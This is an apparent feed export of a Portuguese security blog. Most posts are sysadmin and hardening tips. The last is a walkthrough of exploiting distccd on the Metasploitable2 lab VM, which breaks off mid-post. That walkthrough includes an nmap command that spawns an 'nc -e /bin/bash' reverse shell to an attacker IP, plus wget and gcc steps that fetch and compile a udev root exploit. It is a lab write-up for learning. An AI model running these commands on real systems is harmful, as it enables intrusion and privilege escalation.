tag:blogger.com,1999:blog-90118896187994159182024-03-28T06:28:25.918-03:00Xicos & MusquitinhosTudo sobre segurança da informação: vírus, exploits, vulnerabilidades, configuração de servidores, análise forense, detecção de spam, Linux (Debian, Ubuntu), BackTrack e muito mais.Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.comBlogger241125tag:blogger.com,1999:blog-9011889618799415918.post-73978870981057663672013-02-21T16:15:00.003-03:002013-02-21T16:15:54.165-03:00What's the difference between SSL, TLS, and HTTPS?<br />
What's the difference between SSL, TLS, and HTTPS?<br />
<br />
TLS is the new name for SSL. Namely, SSL protocol got to version 3.0; TLS 1.0 is "SSL 3.1". TLS versions currently defined include TLS 1.1 and 1.2. Each new version adds a few features and modifies some internal details. We sometimes say "SSL/TLS".<br />
<br />
HTTPS is HTTP-within-SSL/TLS. SSL (TLS) establishes a secured bidirectional tunnel for arbitrary binary data between two hosts. HTTP is a protocol for sending requests and receiving answers, each request and answer consisting in detailed headers and (possibly) some content. HTTP is meant to run over a bidirectional tunnel for arbitrary binary data; when that tunnel is a SSL/TLS connection, then the whole is called "HTTPS".<br />
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-64343145218855107692013-02-07T13:50:00.002-03:002013-02-07T13:51:37.162-03:00Estruturas de Controle da Shell<br />
<div class="MsoNormal" style="text-align: justify;">
Só para esclarecer, a Dica do dia
surgiu devido o pouco tempo que estou tendo para escrever um post, com isso
consigo alimentar o blog com dicas interessantes e úteis.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; text-align: justify; text-autospace: none;">
Shell Script nada mais é do que utilizar diversos comandos
do sistema utilizando estruturas de controle e comandos fornecidos pela shell a
fim de automatizar tarefas cotidianas. Conhecer bem as estruturas de controle
da shell é muito importante. Na Dica do dia será feito um breve resumo do
funcionamento de algumas dessas estruturas, entretanto, sugere-se fortemente a
leitura do manual da bash (man bash).<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; text-align: justify; text-autospace: none;">
Para que possamos utilizar bem as ferramentas fornecidas
pela nossa shell preferida, precisamos saber como funciona um comando no
GNU/Linux. Sendo assim, a figura abaixo mostra a “anatomia” de um comando:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVVqWmN97FZn_pWM1I-ulwUmrwOiA3YEAHFKvyOdX8ZP2LEKUivnH9Sm-qebdHCK7GGtCXTLgCII1xAW3Y6YnK2b0utvUUT-TNXIjdfp0Rn8w6o-Pnod3nDDgBkFOK2BFbo4PsAz6_jrw-/s1600/shell.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVVqWmN97FZn_pWM1I-ulwUmrwOiA3YEAHFKvyOdX8ZP2LEKUivnH9Sm-qebdHCK7GGtCXTLgCII1xAW3Y6YnK2b0utvUUT-TNXIjdfp0Rn8w6o-Pnod3nDDgBkFOK2BFbo4PsAz6_jrw-/s320/shell.bmp" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Todo
comando em um sistema Unix-like tem uma entrada padrão (StdIn), uma saída padrão
(StdOut) e uma saída de erro (StdErr), além de um valor de retorno. <span style="text-align: justify;">A entrada padrão de um comando pode ser, por exemplo, um
arquivo que ele irá processar, como no comando:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
#
grep bash /etc/passwd</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; text-align: justify; text-autospace: none;">
No qual o arquivo /etc/passwd é o arquivo de StdIn. Já a saída
padrão desse comando é a tela, pois é nela que o resultado será apresentado.
Caso ocorra algum erro durante a execução desse programa uma mensagem será
enviada a saída de erro que, por padrão, joga a informação também para a tela.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; text-align: justify; text-autospace: none;">
Uma forma de descobrir se o último comando executado
terminou com sucesso ou falhou ao ser executado é verificando o valor que ele
retornou e que fica armazenado na variável $?. Se o valor retornado foi 0, então
o comando foi executado com sucesso, caso contrário, houve algum erro durante a
execução e o número retornado pode ser utilizado para determinar qual erro
ocorreu.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; text-align: justify; text-autospace: none;">
Conhecendo como um comando funciona, podemos utilizar
operadores a fim de alterar as entradas e saídas dos comandos. Os operadores
mais utilizados são:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
• ; separa
um comando do outro;<o:p></o:p></div>
<div class="MsoNormal">
• | transforma
o StdOut de um comando em StdIn para outro;<o:p></o:p></div>
<div class="MsoNormal">
• >
redireciona a StdOut para um arquivo, criando-o ou sobrescrevendo seu conteúdo
caso ele exista;<o:p></o:p></div>
<div class="MsoNormal">
• >>
redireciona a StdOut para um arquivo adicionando o conteúdo ao final dele;<o:p></o:p></div>
<div class="MsoNormal">
• <
joga o conteúdo de um arquivo para o StdIn;<o:p></o:p></div>
<div class="MsoNormal">
• 2>&1
transforma a StdErr em StdOut;<o:p></o:p></div>
<div class="MsoNormal">
• 2>
redireciona a StdErr para um arquivo;<o:p></o:p></div>
<div class="MsoNormal">
• || operador
“ou”, testa o valor da variável $?;<o:p></o:p></div>
<div class="MsoNormal">
• &&
operador “e”, testa o valor da variável $?.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Fonte: Internet (ctrl+c / ctrl+v)</div>
<div class="MsoNormal">
<br /></div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-14046382051682627452013-02-05T15:24:00.001-03:002013-02-05T15:24:10.688-03:00Usando Loop FOR no Windows (Dica do dia)<br />
<div class="MsoNormal" style="text-align: justify;">
Na dica do dia vou mostrar como usar o FOR no Windows. O FOR
é uma estrutura de controle responsável pela execução de looping. No Linux esse
procedimento é bastante divulgado e muito útil no dia-a-dia.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Digamos que precisamos executar o comando “ls” para listar o
conteúdo de vários diretórios, e tais diretórios estão gravados em um arquivo
que chamaremos de dir.txt. O dir.txt possui os seguintes diretórios gravados:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
/tmp</div>
<div class="MsoNormal">
/home</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Neste caso o conteúdo desses diretórios será listado com a
execução do nosso FOR. Veja abaixo como ficaria tal comando no Linux:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US">#for dir in
$(cat dir.txt); do ls $dir; done<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
E como fazer isso no Windows? </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Vamos criar o mesmo arquivo no Windows (dir.txt), porém com
o seguinte conteúdo:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
c:\</div>
<div class="MsoNormal">
c:\windows</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Agora vamos executar nosso FOR:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US">C:\>for
/F "tokens=*" %G IN ('type dir.txt') do dir %G<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Pronto. Temos nosso loop FOR no Windows.</div>
<div class="MsoNormal">
Bom Proveito.</div>
<div class="MsoNormal">
<br /></div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-81639512876837199142013-02-01T16:45:00.001-03:002013-02-01T16:45:22.013-03:00Desabilite IPv6 no Linux (Debian like)<br />
<div class="MsoNormal" style="text-align: justify;">
Na dica do dia vou mostrar como desabilitar o suporte ao
IPv6 no Linux, com isso evitando alguns problemas de incompatibilidade ou
lentidão na rede. Isso só pode ser feito se você não utiliza o IPv6. </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Todos os procedimentos foram realizados numa máquina virtual
rodando Debian 6, o procedimento muda um pouco <st1:personname productid="em distribuições Red Hat" w:st="on"><st1:personname productid="em distribuições Red" w:st="on">em distribuições Red</st1:personname>
Hat</st1:personname> Like.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Com o comando netstat podemos ver se temos algum serviço
utilizando IPv6:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAbu8KBDEqyxCv9h-Bj_xrfRqcPeOdX0dm2S0Z0DbMtsNNKEDWma5ejeRN27sIL4gkO7kdNLbYuCFjw3AAeMq1Oiomti962f-uPE-Huu8KLOcrDmbfjO8jOMswtv-Cbk0OhsHyr6a5Pgyb/s1600/ipv61.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAbu8KBDEqyxCv9h-Bj_xrfRqcPeOdX0dm2S0Z0DbMtsNNKEDWma5ejeRN27sIL4gkO7kdNLbYuCFjw3AAeMq1Oiomti962f-uPE-Huu8KLOcrDmbfjO8jOMswtv-Cbk0OhsHyr6a5Pgyb/s320/ipv61.bmp" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p>Veja que aparece o tcp6 de acordo com os serviços que estão usando o IPv6.</o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Edite o arquivo /etc/modprobe.d/aliases.conf e adicione:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
alias net-pf-10 off</div>
<div class="MsoNormal">
alias ipv6 off</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Saia e salve o arquivo.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Execute o comando abaixo:</div>
<div class="MsoNormal">
echo “net.ipv6.conf.all.disable_ipv6=1”
>> /etc/sysctl.conf<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Renicie o sistema.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Execute o netstat
novamente:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoTljJfZ9tTAfe7Xi1M2vzhobUj5Mo20292fvy-tsheQ_j1NfS6cO882yhsGHe_QrK82-dInvHMJ0bUCSMXY489B5r0KjMrDvst5Ywy_lwFLKjxKMAlti49tChaMa8r306owBYBc9ucs9P/s1600/ipv62.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoTljJfZ9tTAfe7Xi1M2vzhobUj5Mo20292fvy-tsheQ_j1NfS6cO882yhsGHe_QrK82-dInvHMJ0bUCSMXY489B5r0KjMrDvst5Ywy_lwFLKjxKMAlti49tChaMa8r306owBYBc9ucs9P/s320/ipv62.bmp" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Pronto, o suporte
foi desabilitado.</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Em vez de desabilitar o suporte ao IPv6 no Linux, você
poderia fazer isso apenas para um serviço especifico, no caso do SSHD bastava
adicionar: </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
AddressFamily inet </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
No arquivo de configuração (/etc/ssh/sshd_config).</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Bom Proveito.</div>
<div class="MsoNormal">
<br /></div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-5682117411086049362013-01-31T17:53:00.003-03:002013-02-01T15:01:25.354-03:00Help Prevent DoS against Windows Server 2003<br />
<div class="Heading2" style="margin-bottom: 3.0pt; margin-left: 0cm; margin-right: 0cm; margin-top: 12.0pt;">
<b><span lang="EN-US" style="font-size: 16pt;">Security Consideration for
Network Attacks </span></b><span lang="EN-US" style="font-size: 16pt;"><o:p></o:p></span></div>
<div class="Text" style="margin-bottom: 3.0pt; margin-left: 0cm; margin-right: 0cm; margin-top: 3.0pt;">
<br /></div>
<div class="Text" style="margin-bottom: 3.0pt; margin-left: 0cm; margin-right: 0cm; margin-top: 3.0pt;">
<span lang="EN-US">Denial
of service (DoS) attacks are network attacks that attempt to make a computer or
a particular service on a computer unavailable to network users. DoS attacks
can be difficult to defend against. <o:p></o:p></span></div>
<div class="Text" style="margin-bottom: 3.0pt; margin-left: 0cm; margin-right: 0cm; margin-top: 3.0pt;">
<span lang="EN-US"><br /></span></div>
<div class="Text" style="margin: 3pt 0cm; text-align: justify;">
<span lang="EN-US">To help
prevent these attacks, you should keep your computer updated with the latest
security fixes and harden the TCP/IP protocol stack on computers that run
Windows Server 2003 with SP1 and are exposed to potential attackers. The
default TCP/IP stack configuration is tuned to handle standard intranet traffic.
If you connect a computer directly to the Internet, Microsoft recommends that
you harden the TCP/IP stack against DoS attacks. <span style="font-size: x-small;"><o:p></o:p></span></span></div>
<div class="Text" style="margin: 3pt 0cm; text-align: justify;">
<span lang="EN-US" style="font-size: 10pt;"><br /></span></div>
<div class="Text" style="margin-bottom: 3.0pt; margin-left: 0cm; margin-right: 0cm; margin-top: 3.0pt;">
<span lang="EN-US">You can
add the registry values in the following table to the template file in the <o:p></o:p></span></div>
<div class="TextIndented" style="margin-bottom: 3.0pt; margin-left: 18.0pt; margin-right: 18.0pt; margin-top: 3.0pt;">
<b><span lang="EN-US" style="font-family: 'GJJOKB+Arial,Bold';">HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\
</span></b><span lang="EN-US" style="font-family: 'GJJOKB+Arial,Bold';"><o:p></o:p></span></div>
<div class="MsoNormal">
subkey.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7d41duPOTS1KAB-oFYputIDAfh7NvtLYU8Iu6dhIQZHouML0H7D_uND_HiDBcJsK_HAf56tLZcKxc9IDXBv3LbiFtRXYhYJh1GPT0JGFFuQ52nn3TjmjPtVmcAzerZYkOUjUvm3pXWvMV/s1600/registro.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7d41duPOTS1KAB-oFYputIDAfh7NvtLYU8Iu6dhIQZHouML0H7D_uND_HiDBcJsK_HAf56tLZcKxc9IDXBv3LbiFtRXYhYJh1GPT0JGFFuQ52nn3TjmjPtVmcAzerZYkOUjUvm3pXWvMV/s320/registro.bmp" width="320" /></a></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><br /></span></div>
<div class="MsoNormal">
You can download my REG file <a href="http://www.4shared.com/file/6EIUMChy/DoS-protect.html">here</a>.</div>
<div class="MsoNormal">
<br />
source: Securing Windows Server 2003</div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com1tag:blogger.com,1999:blog-9011889618799415918.post-30435840318368238782013-01-31T15:11:00.000-03:002013-01-31T15:11:49.206-03:00Recupere seu Ubuntu (Debian like)<br />
<div class="MsoNormal" style="text-align: justify;">
Essa é uma dica rápida para você que teve algum problema com
o seu Ubuntu (Debian like) e quer tentar recuperar o sistema. Não vou falar das
ferramentas em si para tentar recuperar o sistema e sim como deixar o sistema
pronto para que você possa usar tais ferramentas.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Use um CD do Ubuntu, dê o boot pelo CD e escolha a opção “Try
Ubuntu without any change to your computer”. Essa opção gera um pseudo-sistema
de arquivos que é criado na memória RAM, não danificando o seu sistema. Para reparar seu sistema é necessário
montar a partição onde foi instalado o Ubuntu, neste post vamos
levar em consideração que nosso sistema foi instalado em /dev/sda1. </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Vamos ter que fazer com que a partição do Ubuntu faça parte
da raiz do sistema de arquivos, como se tivéssemos iniciado junto com o boot do
sistema na ora do boot. Lendo algumas dicas da comunidade Ubuntu isso não é
recomendado enquanto o desktop do LiveCD esteja sendo executado, então para
isso temos que mudar para o modo single-user. Apenas faça o procedimento
abaixo:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
1. Você acabou de da o boot pelo CD do Ubuntu, e já esta na Área
de Trabalho. Pressione Ctrl+Alt+F2, em seguida digite o comando “sudo telinit <st1:metricconverter productid="1”" w:st="on">1”</st1:metricconverter> para mudar o nível de execução
do sistema. Uma tela igual da figura abaixo ira aparecer, escolha a opção “root
– drop to root Shell prompt”.</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie2avhANey_KUSDTIGSHbLPWEt_-P6x11gzUDQzetC7k_lVmWkA0mLGZkypjrba1fQwhhIGI7l8vo3ShJEpvpOGiTLFhL4p4dawFqaBEd1G79cNHAWoH9sb6xpO3ZavjuwJ9iN-vjtCVGi/s1600/init1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie2avhANey_KUSDTIGSHbLPWEt_-P6x11gzUDQzetC7k_lVmWkA0mLGZkypjrba1fQwhhIGI7l8vo3ShJEpvpOGiTLFhL4p4dawFqaBEd1G79cNHAWoH9sb6xpO3ZavjuwJ9iN-vjtCVGi/s320/init1.bmp" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
2. Agora execute os comandos abaixo para montar nossa partição
com o Ubuntu instalado e mudar o diretório root atual para este diretório.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US">#mkdir /mnt/ubuntu<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">#mount
/dev/sda1 /mnt/ubuntu<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">#chroot /mnt/ubuntu<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">#bash<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Pronto, podemos executar qualquer comando para tentar
recuperar nosso sistema, a partir desse momento a raiz do sistema "/" será /mnt/ubuntu.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Bom Proveito.</div>
<div class="MsoNormal">
<br /></div>
Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com1tag:blogger.com,1999:blog-9011889618799415918.post-9928794254961456552013-01-30T17:19:00.001-03:002013-01-30T17:19:36.658-03:00Using Metasploit Browser AutopwnComo é fácil se parecer com um hacker.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="270" src="http://www.youtube.com/embed/tbX7SKjd_m4" width="480"></iframe>Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-54798624644423821862013-01-30T14:41:00.001-03:002013-01-30T14:41:53.365-03:00Metasploit - Post Exploitation Gathering WinSCP Credentials<iframe allowfullscreen="" frameborder="0" height="344" src="http://www.youtube.com/embed/eFMIZCD9xz4" width="459"></iframe>Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-90897631200621624672013-01-30T11:10:00.001-03:002013-01-30T11:10:48.993-03:00Alert - PHP errors enabledYou can disable display_errors from your site’s php.ini, from the PHP code itself or from the .htaccess as follows:<br /><br />php.ini<br />display_errors = ‘off’<br />log_errors = ‘on’<br /><br />.htaccess<br />php_flag display_errors off<br />php_flag log_errors on<br /><br />Turn off error reporting using PHP code in your PHP website<br /> error_reporting(0); // Turn off all error reporting<br /> ?><br />
<br />
fonte: http://www.websitedefender.com/web-security/php-errors-enabled/<br />
<br />Osvaldohttp://www.blogger.com/profile/12343065778748386131noreply@blogger.com0tag:blogger.com,1999:blog-9011889618799415918.post-54266404274301735522013-01-29T15:49:00.003-03:002013-01-29T15:49:53.716-03:00Analisando o vídeo: Metasploitable 2 Distccd Exploit and Privilege Escalation<span style="font-family: Arial; font-size: 10pt; text-align: justify;">No projeto Metasploitable2 tem uma
falha do Distccd que escuta na porta 3632/TCP, essa falha já pode ser explorada
usando o Metasploit (use exploit/unix/misc/distcc_exec).</span><br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Usando o Metasploit tudo é mais
fácil e bem flexível, dependendo da sua necessidade é uma ótima opção. O que
mais me chama atenção não é o simples fato de explorar a falha e conseguir um
shell, e sim entender como tudo funciona, a técnica, as habilidades
necessárias, entre outras coisas.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Navegando pela Internet encontrei um
vídeo que mostra como explorar esta falha de uma maneira diferente, mais
trabalhosa é claro, mas que vale apena analisar. A proposta aqui não é mostrar
o que fazer, porque isso já se tem no vídeo, e sim de maneira clara e direta
tentar explicar o porquê de tais passos. Primeiramente recomendo que você veja
o vídeo:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<iframe allowfullscreen="" frameborder="0" height="270" src="http://www.youtube.com/embed/Q2Seos0DWB8" width="480"></iframe>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">Antes de começarmos veja abaixo o cenário
criado no vídeo:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Re6BuF9cXLTDvnxJjsqG8MJK9R7POxCLUW2IE0mqkJ1ZBRMEDFR_YohfydCMfiVWYoxcnL3LH26NVUr05t5vKZT9FKakkDGlyprkI6Ap9We7IK4Y2aBtG1ktneNyv4uL0pJUekCWp8yw/s1600/saida.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Re6BuF9cXLTDvnxJjsqG8MJK9R7POxCLUW2IE0mqkJ1ZBRMEDFR_YohfydCMfiVWYoxcnL3LH26NVUr05t5vKZT9FKakkDGlyprkI6Ap9We7IK4Y2aBtG1ktneNyv4uL0pJUekCWp8yw/s320/saida.bmp" width="320" /></a></div>
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"><b>Passo 1</b><o:p></o:p></span><br />
<span style="font-family: Arial; font-size: 10.0pt;"><b><br /></b></span></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Foi usado a ferramenta nmap para
tentar obter a versão do Sistema Operacional (-O) e a versão dos serviços (-sV)
que poderão estar escutando entre as portas 1 e 65535 (-p1-65535) da máquina
192.168.2.58 (Metasploitable2). Podemos ver que o resultado do comando mostra
que a porta 3632/TCP esta aberta e mostra também a versão do Distccd.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"><b>Passo 2</b><o:p></o:p></span><br />
<span style="font-family: Arial; font-size: 10.0pt;"><b><br /></b></span></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Nessa etapa ele mencionou que iria
fazer uma busca na base de exploits usando como palavra-chave
"distcc", como podemos ver não foi isso que foi feito. Se essa busca
fosse realizada retornaria dois exploits que pertence ao projeto Metasploit,
como não é o nosso foco usar o Metasploit então não serve. Outra coisa que deve
ser observado é que esta etapa não deveria acontecer nesse momento, e sim só
depois de já ter invadido o servidor, onde em seguida ele buscaria alguma
brecha no sistema para elevar seus privilégios. Vamos fazer assim, digamos que
ele ainda não realizou essa etapa e no momento certo a executaremos.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"><b>Passo 3</b><o:p></o:p></span><br />
<span style="font-family: Arial; font-size: 10.0pt;"><br /></span></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Bom, só para deixar claro esse seria
o nosso segundo passo apesar de estar passo 3. Primeiramente vamos falar do
script do Nmap. Esse script detecta e explora a vulnerabilidade do Distccd e
pode ser usado para executar algum comando na máquina alvo, foi exatamente isso
que foi feito com a opção:<o:p></o:p></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;"><br /></span></div>
</div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial; font-size: 10.0pt; mso-ansi-language: EN-US;">--script-args="distcc-exec.cmd='nc
-e /bin/bash 192.168.2.41 6676'". </span><br />
<span style="font-family: Arial; font-size: 10.0pt;"><br /></span>
<span style="font-family: Arial; font-size: 10.0pt;">Neste caso o comando nc é executado, a opção -e indica o que
deverá ser executado depois que a conexão é estabelecida, neste caso a nossa
shell (/bin/bash). Neste cenário temos uma conexão reversa, mas para funcionar
temos que executar o comando nc em um terminal da máquina de IP 192.168.2.41 (BackTrack)
para escutar na porta 6676, assim a máquina alvo vai se conectar na nossa máquina
pela porta 6676. Abra outro terminal e execute o comando abaixo:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">#nc -vnlp 6676<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">Agora só é executar o comando nmap
abaixo:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial; font-size: 10.0pt; mso-ansi-language: EN-US;">#nmap
-p 3632 192.168.2.58 --script distcc-cve2004-2687
--script-args="distcc-exec.cmd='nc -e /bin/bash 192.168.2.41 6676'"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">E na tela onde executou o nc para
escutar na porta 6676 é só executar qualquer comando do linux. No vídeo ele
executa o “uname”, para obter informações do sistema e depois executa o comando
“id”, para ver suas permissões no sistema, neste caso uid=1 (daemon) que é um
usuário sem privilégios.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"><b>Passo 4</b><o:p></o:p></span><br />
<span style="font-family: Arial; font-size: 10.0pt;"><b><br /></b></span></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Lembra do passo 2? Agora chegou a
hora dele. Já conseguimos invadir o sistema e sabemos que não somos root,
próximo passo escalar privilégio, ou seja, vamos virar root na máquina. Existem
vários programas que agilizam este processo, não vou detalhar aqui isso, faça
uma busca pelo Google. Com informações sobre o sistema podemos buscar por
exploits conhecidos, neste caso sabemos que se trata do Metasploitable2, sendo
assim é um Ubuntu 8.04 que por padrão vem com o distcc vulnerável (<a href="http://www.ubuntu.com/usn/usn-758-1/">http://www.ubuntu.com/usn/usn-758-1/</a>),
tendo essas informações vamos realizar o que seria nosso passo 2.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">Ele buscou na base de exploits se
tem algo para o udev:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial; font-size: 10.0pt; mso-ansi-language: EN-US;">#cd
/pentest/exploits/exploitdb<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: Arial; font-size: 10.0pt; mso-ansi-language: EN-US;">#./searchsploit
udev linux local<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 10.0pt;">Retornou duas opções, neste caso ele
usou o segundo exploit (8572.c). Próximo passo seria copiar esse arquivo para a
máquina alvo, para isso ele copiou o exploit para dentro do /var/ww renomeando
para udev.c. Esse diretório é padrão do Apache Linux, que esta rodando no
backtrack. Executando o wget (wget http://192.168.2.41/udev.c) na conexão
reversa ele consegue baixar este arquivo para dentro da máquina vulnerável e
compila (gcc udev.c -o udev) o mesmo.<o:p></o:p></span></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
